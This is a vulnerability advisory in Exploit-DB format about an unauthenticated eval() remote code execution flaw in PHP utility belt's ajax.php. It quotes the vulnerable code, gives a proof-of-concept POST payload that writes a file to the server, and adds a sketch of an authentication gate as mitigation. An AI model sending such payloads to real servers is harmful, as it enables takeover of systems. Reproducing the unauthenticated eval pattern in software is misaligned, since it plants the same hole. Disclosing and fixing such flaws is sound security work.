Vendor: PHP utility belt
By: WICS
CVSS: 9.8 (HIGH)
Type: Remote Code Execution
CWE: 78
Product Name: PHP utility belt
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

PHP utility belt Remote Code Execution vulnerability

PHP utility belt is a set of tools for PHP developers, meant to be installed in a browser-accessible directory. Its ajax.php endpoint is reachable without any authentication and passes the POST parameter code directly to eval(), so any client that can reach the endpoint can execute arbitrary PHP code on the server. The published proof of concept uses this to create a PHP file, info.php, which displays the PHP info page.

Mitigation:

Authentication should be implemented for ajax.php.

Exploit-DB raw data:

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author         : WICS
Date             : 8/12/2015
Software Link  : https://github.com/mboynes/php-utility-belt

Overview:


PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication.

Vulnerable code (lines 12 to 15):

if ( isset( $_POST['code'] ) ) {
  if ( false === eval( $_POST['code'] ) )
    echo 'PHP Error encountered, execution halted';
}


POC

Access URL:
http://127.0.0.1/php-utility-belt/ajax.php
In the POST data, type:
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

The above code will generate an info.php file, which will display the PHP info.
The shell link will be:
http://127.0.0.1/php-utility-belt/info.php
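
The mitigation stated above (authentication for ajax.php), sketched as an added example that is not the project's code or the advisory author's: a gate placed ahead of the eval() block that fails closed, accepts only loopback clients, and requires a shared secret. The UTILITY_BELT_TOKEN environment variable, the X-Belt-Token header and the belt_gate() function are assumptions made for this illustration.

```php
<?php
// Added example: access gate for the top of ajax.php, ahead of the eval() block.
// Assumptions (not from the project): the secret is provisioned in the
// UTILITY_BELT_TOKEN environment variable and sent in an X-Belt-Token header.
declare(strict_types=1);

/**
 * Decide whether a request may reach the code-execution endpoint.
 * Returns an HTTP status: 200 to proceed, anything else to refuse.
 */
function belt_gate(array $server, string $expectedToken): int
{
    // Fail closed when no token has been configured.
    if ($expectedToken === '') {
        return 503;
    }
    // A developer tool has no reason to answer non-local clients.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, ['127.0.0.1', '::1'], true)) {
        return 403;
    }
    // The tool only needs POST.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 405;
    }
    // Constant-time comparison of the shared secret.
    $supplied = $server['HTTP_X_BELT_TOKEN'] ?? '';
    if (!is_string($supplied) || !hash_equals($expectedToken, $supplied)) {
        return 401;
    }
    return 200;
}

$status = belt_gate($_SERVER, (string) getenv('UTILITY_BELT_TOKEN'));
if ($status !== 200) {
    http_response_code($status);
    exit('Access denied');
}

// Original behaviour, now reachable only by an authenticated local request.
if (isset($_POST['code'])) {
    if (false === eval($_POST['code'])) {
        echo 'PHP Error encountered, execution halted';
    }
}
```

The header check matters as much as the address check: a loopback-only rule still accepts a form submitted to 127.0.0.1 by any page open in the developer's browser, whereas a cross-origin form cannot attach X-Belt-Token.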